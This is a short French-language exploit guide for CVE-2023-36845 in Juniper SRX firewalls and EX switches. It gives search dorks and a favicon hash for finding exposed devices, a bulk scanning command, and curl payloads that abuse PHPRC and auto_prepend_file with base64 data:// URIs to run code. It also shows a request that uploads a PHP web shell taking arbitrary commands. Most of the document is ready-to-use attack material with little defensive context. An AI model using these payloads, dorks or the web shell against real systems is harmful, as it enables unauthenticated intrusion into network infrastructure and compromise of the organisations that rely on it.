
Juniper Firewalls CVE-2023-36845 - RCE
CVE-2023-36845 représente une vulnérabilité notable de manipulation de variables d'environnement PHP qui impacte les pare-feu Juniper SRX et les commutateurs EX. Bien que Juniper ait classé cette vulnérabilité comme étant de sévérité moyenne, dans cet article, nous expliquerons comment cette seule vulnérabilité peut être exploitée pour une exécution de code à distance sans authentification.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
Détection
python3 CVE-2023-36845.py -f targets.txt -o output.txt
Il est possible d'utiliser n'importe quel wrapper de protocole conjointement avec auto_prepend_file. Le choix le plus approprié pour cette opération est le protocole data://, qui permet de fournir le « fichier secondaire » en ligne. Voici une représentation sophistiquée de cette exploitation, exécutant le <? phpinfo(); ?> intégré dans le schéma data:// :
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
Exécuter la commande whoami
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
Télécharger un fichier
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| Paramètre | Description | Type |
|---|---|---|
| --file / -f | Fichier d'entrée des cibles | Fichier |
| -o | Fichier de sortie | Fichier |